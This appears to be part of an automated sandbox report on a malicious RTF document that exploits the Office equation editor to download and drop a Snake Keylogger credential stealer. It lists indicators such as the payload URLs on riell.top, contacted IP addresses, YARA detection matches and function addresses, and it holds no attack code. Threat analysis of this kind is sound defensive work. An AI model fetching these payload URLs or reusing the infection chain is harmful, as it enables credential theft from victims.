            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.898671670.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.898671670.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000240E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: obi23456.scr, 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: obi23456.scr, 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
            Source: EQNEDT32.EXE, 00000008.00000003.373161386.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, riell.top.url.0.drString found in binary or memory: https://riell.top/
            Source: obb.doc.url.0.drString found in binary or memory: https://riell.top/obb.doc
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000003.373161386.000000000059F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/obb.scr
            Source: EQNEDT32.EXE, 00000008.00000003.373161386.000000000059F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/obb.scrMC:
            Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/obb.scrhhC:
            Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/obb.scri
            Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/obb.scrj
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
            Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
            Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
            Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
            Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
            Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 9.2.obi23456.scr.31b7b70.6.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 9.2.obi23456.scr.780000.2.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 9.2.obi23456.scr.780000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 9.2.obi23456.scr.21b9714.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000009.00000002.374594204.0000000000780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Microsoft Office drops suspicious files
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\obb.doc.urlJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\riell.top.urlJump to behavior
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obi23456.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrJump to dropped file
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess Stats: CPU usage > 49%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 9_2_0026425F9_2_0026425F
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C503810_2_001C5038
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C306510_2_001C3065
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C389110_2_001C3891
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C78C110_2_001C78C1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C291010_2_001C2910
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C413010_2_001C4130
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001CD1D810_2_001CD1D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C5B1810_2_001C5B18
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C3B7210_2_001C3B72
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C2BF110_2_001C2BF1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C844D10_2_001C844D
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C8CB210_2_001C8CB2
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C35B010_2_001C35B0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C3E5010_2_001C3E50
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001CC75010_2_001CC750
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C674010_2_001C6740
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C700010_2_001C7000
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C6BA010_2_001C6BA0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001C746010_2_001C7460
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001CC74010_2_001CC740
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001CBFC810_2_001CBFC8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001CBFC510_2_001CBFC5
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FF46010_2_003FF460
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FD4E010_2_003FD4E0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FE17810_2_003FE178
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FEE1010_2_003FEE10
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F5E5810_2_003F5E58
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FDB3010_2_003FDB30
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FE7C010_2_003FE7C0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F443C10_2_003F443C
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F102810_2_003F1028
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FC02810_2_003FC028
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F101810_2_003F1018
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F147110_2_003F1471
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F946810_2_003F9468
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F945910_2_003F9459
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F444810_2_003F4448
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F6CBC10_2_003F6CBC
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F48A010_2_003F48A0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F489010_2_003F4890
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F148010_2_003F1480
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FC48010_2_003FC480
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F4CF810_2_003F4CF8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F4CF010_2_003F4CF0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F98E810_2_003F98E8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F18D810_2_003F18D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FC8D810_2_003FC8D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F18C910_2_003F18C9
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F6CC810_2_003F6CC8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F1D3010_2_003F1D30
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F1D2010_2_003F1D20
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F217810_2_003F2178
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F515010_2_003F5150
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F9D4010_2_003F9D40
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F514010_2_003F5140
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F55A810_2_003F55A8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FA19810_2_003FA198
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F559810_2_003F5598
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F218810_2_003F2188
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FA18810_2_003FA188
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F59F810_2_003F59F8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FA5F010_2_003FA5F0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FA5E110_2_003FA5E1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F25E010_2_003F25E0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F25D110_2_003F25D1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F2A3810_2_003F2A38
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FAA3810_2_003FAA38
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F2A2810_2_003F2A28
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F7A1010_2_003F7A10
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F5A0010_2_003F5A00
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FAA4810_2_003FAA48
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FAEA010_2_003FAEA0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F769810_2_003F7698
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F2E9010_2_003F2E90
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FAE9010_2_003FAE90
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F2E8110_2_003F2E81
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F32E810_2_003F32E8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F32D910_2_003F32D9
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F373810_2_003F3738
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F032010_2_003F0320
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FB32010_2_003FB320
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FB31110_2_003FB311
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F031010_2_003F0310
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F870810_2_003F8708
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F077810_2_003F0778
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FB77810_2_003FB778
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F076810_2_003F0768
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003FB76710_2_003FB767
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F374010_2_003F3740
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_003F3B9810_2_003F3B98
